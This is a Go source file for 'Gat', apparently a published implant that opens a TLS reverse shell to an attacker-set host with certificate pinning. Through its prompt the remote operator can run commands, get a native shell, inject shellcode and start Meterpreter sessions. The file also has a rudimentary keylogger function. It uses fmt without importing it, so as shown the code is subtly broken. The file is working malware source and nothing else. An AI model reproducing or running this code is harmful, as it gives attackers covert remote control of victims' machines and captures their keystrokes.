github.com/m1ddl3w4r3/Gat@v0.0.0-20221205171512-b6bb6e613409/Gat.go (about) 1 package main 2 3 import ( 4 "bufio" 5 "bytes" 6 "crypto/sha256" 7 "crypto/tls" 8 "encoding/hex" 9 "net" 10 "os" 11 "strings" 12 13 "github.com/m1ddl3w4r3/Gat/meterpreter" 14 "github.com/m1ddl3w4r3/Gat/shell" 15 ) 16 17 const ( 18 errCouldNotDecode = 1 << iota 19 errHostUnreachable = iota 20 errBadFingerprint = iota 21 ) 22 23 var ( 24 connectString string 25 fingerPrint string 26 ) 27 28 func interactiveShell(conn net.Conn) { 29 var ( 30 exit = false 31 prompt = "[Gat]> " 32 scanner = bufio.NewScanner(conn) 33 ) 34 35 conn.Write([]byte(prompt)) 36 37 for scanner.Scan() { 38 command := scanner.Text() 39 if len(command) > 1 { 40 argv := strings.Split(command, " ") 41 switch argv[0] { 42 case "meterpreter": 43 if len(argv) > 2 { 44 transport := argv[1] 45 address := argv[2] 46 ok, err := meterpreter.Meterpreter(transport, address) 47 if !ok { 48 conn.Write([]byte(err.Error() + "\n")) 49 } 50 } else { 51 conn.Write([]byte("Usage: meterpreter [tcp|http|https] IP:PORT\n")) 52 } 53 case "inject": 54 if len(argv) > 1 { 55 shell.InjectShellcode(argv[1]) 56 } 57 case "exit": 58 exit = true 59 case "run_shell": 60 conn.Write([]byte("Enjoy your native shell\n")) 61 runShell(conn) 62 default: 63 shell.ExecuteCmd(command, conn) 64 } 65 66 if exit { 67 break 68 } 69 70 } 71 conn.Write([]byte(prompt)) 72 } 73 } 74 75 func keylog() { 76 // Open a file to write the keystrokes to 77 f, err := os.OpenFile("keystrokes.txt", os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0644) 78 if err != nil { 79 fmt.Printf("Error opening file: %v\n", err) 80 return 81 } 82 defer f.Close() 83 84 // Create a buffered writer to write the keystrokes to the file 85 w := bufio.NewWriter(f) 86 87 // Read input from the keyboard one character at a time 88 reader := bufio.NewReader(os.Stdin) 89 for { 90 // Read a single character from the keyboard 91 char, _, err := reader.ReadRune() 92 if err != nil { 93 break 94 } 95 96 // Write the character to the file 97 w.WriteRune(char) 98 99 // Flush the buffered writer to ensure that the character is written to the file 100 w.Flush() 101 } 102 } 103 104 func runShell(conn net.Conn) { 105 var cmd = shell.GetShell() 106 cmd.Stdout = conn 107 cmd.Stderr = conn 108 cmd.Stdin = conn 109 cmd.Run() 110 } 111 112 func checkKeyPin(conn *tls.Conn, fingerprint []byte) (bool, error) { 113 valid := false 114 connState := conn.ConnectionState() 115 for _, peerCert := range connState.PeerCertificates { 116 hash := sha256.Sum256(peerCert.Raw) 117 if bytes.Compare(hash[0:], fingerprint) == 0 { 118 valid = true 119 } 120 } 121 return valid, nil 122 } 123 124 func reverse(connectString string, fingerprint []byte) { 125 var ( 126 conn *tls.Conn 127 err error 128 ) 129 config := &tls.Config{InsecureSkipVerify: true} 130 if conn, err = tls.Dial("tcp", connectString, config); err != nil { 131 os.Exit(errHostUnreachable) 132 } 133 134 defer conn.Close() 135 136 if ok, err := checkKeyPin(conn, fingerprint); err != nil || !ok { 137 os.Exit(errBadFingerprint) 138 } 139 interactiveShell(conn) 140 } 141 142 func main() { 143 if connectString != "" && fingerPrint != "" { 144 fprint := strings.Replace(fingerPrint, ":", "", -1) 145 bytesFingerprint, err := hex.DecodeString(fprint) 146 if err != nil { 147 os.Exit(errCouldNotDecode) 148 } 149 reverse(connectString, bytesFingerprint) 150 } 151 }